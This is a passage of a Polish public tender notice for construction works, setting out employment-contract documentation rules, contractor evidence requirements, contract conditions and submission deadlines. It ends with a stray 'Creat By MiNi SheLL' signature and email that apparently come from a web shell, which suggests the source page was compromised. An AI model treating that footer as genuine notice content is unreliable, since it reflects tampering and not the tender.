pracę w rozumieniu przepisów ustawy z dnia 26 czerwca 1974 r. – Kodeks pracy (t. jedn. Dz. U. z<br/>2023 r. poz. 1465).<br/>3) Stosownie do sposobu zatrudnienia osób o którym mowa w art. 95 ust. 1, zgodnie z zapisami art. 95 ust. 2 ustawy PZP -<br/>sposobu dokumentowania zatrudnienia osób, Zamawiający będzie wymagał:<br/>a) od Wykonawcy w terminie do 7 dni roboczych od dnia otrzymania żądania (każdorazowo na żądanie Zamawiającego),<br/>przedłożył potwierdzone za zgodność z oryginałem kopie umów o pracę (w formie zanonimizowanej) zawartych pomiędzy<br/>Wykonawcą bądź podwykonawcą a pracownikami, przez cały okres realizacji zamówienia, zgodnie z oświadczeniem<br/>będącym załącznikiem nr 11 do SWZ,<br/>b) Zamawiający uprawniony jest w szczególności do:<br/> żądania oświadczeń i dokumentów w zakresie potwierdzenia spełniania ww. wymogów i dokonywania ich oceny,<br/> żądania wyjaśnień w przypadku wątpliwości w zakresie potwierdzenia spełniania ww. wymogów,<br/> przeprowadzania kontroli na miejscu wykonywania świadczenia.<br/>4) Nieprzedłożenie przez Wykonawcę kopii umów zawartych przez Wykonawcę z pracownikami, o których mowa w<br/>Rozdziale XII ust. 4 pkt. 1 SWZ w terminie 7 dni roboczych od daty wskazanej pkt. 3 ust. 1 przez Zamawiającego będzie<br/>traktowane, jako niewypełnienie obowiązku zatrudnienia pracowników na podstawie umowy o pracę oraz będzie skutkować<br/>naliczeniem kar umownych w wysokości określonej w załączonym do SWZ wzorze Umowy. Niedopełnienie ww. obowiązku<br/>skutkować będzie również przesłaniem zawiadomienia do Państwowej Inspekcji Pracy z informacją, że istnieje uzasadniona<br/>przesłanka, iż osoby zatrudnione przez Wykonawcę świadczą stosunek pracy w oparciu o umowę cywilnoprawną.<br/>5) Zamawiający wymaga, aby po zawarciu Umowy z Wykonawcą i przed rozpoczęciem realizacji przedmiotu Umowy w<br/>zakresie czynności, do których niezbędne jest zatrudnienie osób na podstawie Umowy o pracę, Wykonawca przedłożył w<br/>terminie 7 dni roboczych od dnia zawarcia umowy listę osób zatrudnionych na podstawie umów o pracę, która posłuży do<br/>wydania imiennych identyfikatorów. Obowiązek ten dotyczy także podwykonawcy, co oznacza, że podwykonawca<br/>zobowiązany jest do przedłożenia listy osób zatrudnionych na umowę o pracę w terminie 7 dni od dnia zawarcia Umowy o<br/>podwykonawstwo. Wykonawca zobowiązany jest również do przedłożenia w formie pisemnej wykazu pozostałych osób,<br/>które będą uczestniczyły w realizacji zamówienia, ale nie są zatrudnione na Umowę o pracę.<br/>5. W przypadku, gdy Wykonawca powołuje się na doświadczenie nabyte w ramach zamówienia zrealizowanego przez<br/>wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum), Zamawiający nie dopuszcza by Wykonawca<br/>wykazywał doświadczenie grupy wykonawców, której był członkiem, jeżeli faktycznie i konkretnie nie wykonywał danego<br/>zakresu czynności. Zamawiający zastrzega sobie możliwość zwrócenia się do Wykonawcy o udzielenie wyjaśnień w<br/>zakresie faktycznie i konkretnie zrealizowanego zakresu czynności oraz przedstawienia stosownych dowodów np. umowy<br/>konsorcjum, z której wynika zakres obowiązków, czy wystawionych przez wykonawcę faktur.<br/>6. Wykonawca, który polega na sytuacji finansowej lub ekonomicznej innych podmiotów, odpowiada solidarnie z podmiotem,<br/>który zobowiązał się do udostępnienia zasobów, za szkodę poniesioną przez Zamawiającego powstałą wskutek<br/>nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów podmiot ten nie ponosi winy. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) Dokumenty<br/>potwierdzające uprawnienie do podpisania oferty oraz do podpisania lub poświadczenia za zgodność z oryginałem składanych<br/>oświadczeń lub dokumentów. Jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji dokumentem właściwym jest odpis<br/>lub informacja z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego<br/>właściwego rejestru lub dokumenty na podstawie których dokonuje się wpisu do właściwego rejestru lub ewidencji np. uchwała<br/>właściwego organu Wykonawcy;<br/>2) Pełnomocnictwo, w przypadku, gdy ofertę lub załączone do niej oświadczenie lub dokumenty podpisuje pełnomocnik;<br/>3) Oświadczenie o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu, zgodny z Załącznikiem nr 3 do SWZ,<br/>aktualne na dzień składania ofert, celem potwierdzenia, że Wykonawca nie podlega wykluczeniu z postępowania na podstawie art.<br/>108 ust. 1 oraz art. 109 ust. 1 pkt4), 5) oraz 7)-10) ustawy Pzp oraz spełnia warunki udziału w postępowaniu określone w SWZ. W<br/>przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie składa każdy z Wykonawców wspólnie<br/>ubiegających się o zamówienie.<br/>4) Oświadczenie, zgodne w treści z Załącznikiem nr 4 do SWZ, aktualne na dzień składania ofert, dotyczące innych podmiotów, na<br/>których zasoby powołuje się Wykonawca, celem wykazania braku istnienia wobec nich podstaw wykluczenia oraz spełniania, w<br/>zakresie, w jakim Wykonawca powołuje się na ich zasoby, warunków udziału w postępowaniu.<br/>5) Dowód potwierdzający, że Wykonawca realizując zamówienie będzie dysponował niezbędnymi zasobami innych podmiotów, który<br/>stanowi w szczególności zobowiązanie tych podmiotów do oddania do dyspozycji Wykonawcy niezbędnych zasobów na potrzeby<br/>realizacji zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienia, będzie<br/>dysponował niezbędnymi zasobami tych podmiotów. Zobowiązanie podmiotu udostępniającego zasoby, potwierdza, że stosunek<br/>łączący wykonawcę z podmiotami udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz określa w<br/>szczególności:<br/>a) zakres dostępnych wykonawcy zasobów podmiotu udostępniającego zasoby;<br/>b) sposób i okres udostępnienia Wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te zasoby przy<br/>wykonywaniu zamówienia;<br/>c) czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego<br/>Wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia, zrealizuje roboty budowlane lub usługi, których wskazane zdolności dotyczą.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)<br/>Oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, w zakresie podstaw wykluczenia z postępowania<br/>wskazanych przez zamawiającego, zgodnego z wzorem stanowiącym Załącznik nr 5 do SWZ.<br/>2) Odpis lub informacja z Krajowego Rejestru Sądowego lub Centralnej Ewidencji i Informacji o Działalności Gospodarczej,<br/>sporządzone nie wcześniej niż 3 miesiące przed ich złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w<br/>celu potwierdzenia braku podstaw wykluczenia na podstawie art. 109 ust. 1 pkt 4 ustawy Pzp.<br/>3) Oświadczenie Wykonawcy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o<br/>ochronie konkurencji i konsumentów (Dz.U.2023 poz.1689), z innym wykonawcą, który złożył odrębną ofertę, albo oświadczenie o<br/>przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty,<br/>niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej, zgodnego z wzorem stanowiącym Załącznik nr 6 do<br/>SWZ.<br/>4) Zamawiający przed udzieleniem zamówienia, wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w<br/>wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia, oświadczeń lub dokumentów, o których mowa w<br/>Rozdziale XII ust.3 pkt 1) – 3). Wykonawca, który polega na zdolnościach lub sytuacji innych podmiotów na zasadach określonych w<br/>art. 118 ustawy Pzp w ww. terminie składa również, aktualne na dzień złożenia, oświadczenia lub dokumenty wymienione w<br/>Rozdziale XII ust.3 pkt 1) – 3) dotyczące każdego z tych podmiotów.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1) Wykaz wykonywanych przez Wykonawcę robót budowlanych o wartości nie mniejszej niż 400 000,00 zł wykonanych nie<br/>wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert.<br/>2) Wykaz robót budowlanych kierowanych przez wskazanego przez Wykonawcę Kierownika budowy w specjalności<br/>konstrukcyjno – budowlanej bez ograniczeń.<br/>3) Wykaz wykonanych robót budowlanych kierowanych przez wskazanego przez Wykonawcę Kierownika w branży<br/>instalacyjnej - w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez<br/>ograniczeń.<br/>4) Wykaz wykonanych robót budowlanych kierowanych przez wskazanego przez Wykonawcę Kierownika w branży<br/>instalacyjnej w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych,<br/>wodociągowych i kanalizacyjnych bez ograniczeń <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Brak <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Brak <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-07-18 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma e-Zamówienia</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-07-18 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Zgodnie z art. 462 ust. 3 ustawy PZP w przypadku zamówień na roboty budowlane lub usługi, które mają być wykonane w<br/>miejscu podlegającym bezpośredniemu nadzorowi zamawiającego, zamawiający żąda, aby przed przystąpieniem do<br/>wykonania zamówienia wykonawca, o ile są już znane, podał nazwy albo imiona i nazwiska oraz dane kontaktowe<br/>podwykonawców i osób do kontaktu z nimi, zaangażowanych w takie roboty budowlane lub usługi. Wykonawca zawiadamia<br/>zamawiającego o wszelkich zmianach danych, o których mowa w zdaniu pierwszym, w trakcie realizacji zamówienia, a<br/>także przekazuje informacje na temat nowych podwykonawców, którym w późniejszym okresie zamierza powierzyć<br/>realizację robót budowlanych lub usług.<br/>2. Przed przystąpieniem do realizacji przedmiotu zamówienia Wykonawca odpowiedzialny za całość robót przedstawi listę<br/>wszystkich pracowników, którzy będą wykonywali prace na terenie Ośrodka.<br/>3. Zgodnie z art. 462 ust. 6 ustawy PZP jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego<br/>zasoby Wykonawca powoływał się, na zasadach określonych w art. 118 ust. 1, w celu wykazania spełniania warunków<br/>udziału w postępowaniu lub kryteriów selekcji, Wykonawca jest obowiązany wykazać Zamawiającemu, że proponowany inny<br/>podwykonawca lub Wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż podwykonawca, na którego zasoby<br/>wykonawca powoływał się w trakcie postępowania o udzielenie zamówienia.<br/>4. Zgodnie z art. 462 ust. 5 ustawy PZP, jeżeli powierzenie podwykonawcy wykonania części zamówienia na roboty<br/>budowlane lub usługi następuje w trakcie jego realizacji, Wykonawca na żądanie Zamawiającego przedstawia oświadczenia<br/>lub dokumenty potwierdzające brak podstaw wykluczenia wobec tego podwykonawcy (art.125 ust. 1 ustawy PZP).<br/>5. Wszystkie zainstalowane urządzenia i wyposażenie musi posiadać gwarancję min. 1 rok.

Creat By MiNi SheLL
Email: jattceo@gmail.com